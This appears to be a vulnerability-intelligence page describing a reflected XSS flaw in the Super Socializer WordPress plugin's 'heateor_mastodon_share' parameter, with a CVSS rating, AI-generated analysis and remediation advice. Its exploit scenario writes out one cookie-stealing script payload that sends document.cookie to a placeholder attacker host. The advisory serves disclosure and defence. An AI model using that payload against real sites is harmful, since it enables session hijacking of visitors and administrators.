Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Network-delivered reflected XSS requires no privileges (PR:N) but mandatory victim click (UI:R); scope changes to victim's browser (S:C) with limited confidentiality and integrity impact; no availability impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Social Share, Social Login and Social Comments Plugin - Super Socializer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'heateor_mastodon_share' parameter in all versions up to, and including, 7.14.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
AnalysisAI
Reflected Cross-Site Scripting in the Super Socializer WordPress plugin (versions up to and including 7.14.5) enables unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'heateor_mastodon_share' parameter, discovered and reported by Wordfence with source-level confirmation at helper.php lines 1243-1246. Successful exploitation requires social engineering a victim into clicking a crafted URL, after which the payload executes within the victim's browser session in the context of the target WordPress site. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | The Mastodon share feature of the Super Socializer plugin must be active and the plugin version must be 7.14.5 or earlier on the target WordPress installation. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.1 vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N yields a base score of 6.1 (Medium). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker constructs a URL targeting an affected WordPress site, embedding a JavaScript payload in the 'heateor_mastodon_share' GET parameter (e.g., appending ?heateor_mastodon_share=<script>document.location='https://attacker.tld/steal?c='+document.cookie</script> to a share endpoint). The attacker distributes this link via phishing email or a social media post, tricking a site visitor or administrator into clicking it; upon page load, the unsanitized parameter is reflected into the HTML response and the injected script executes in the victim's browser, stealing session cookies or performing actions under the victim's identity. … |
| Remediation | Patch available per vendor advisory - update the Super Socializer plugin to a version beyond 7.14.5 as soon as a patched release is published; the exact fix version is not confirmed in available data, so monitor the WordPress plugin repository and the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/37d9171d-4722-4ebc-a773-9fd497bc12cf for release confirmation. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42168
GHSA-4f3m-h538-6f53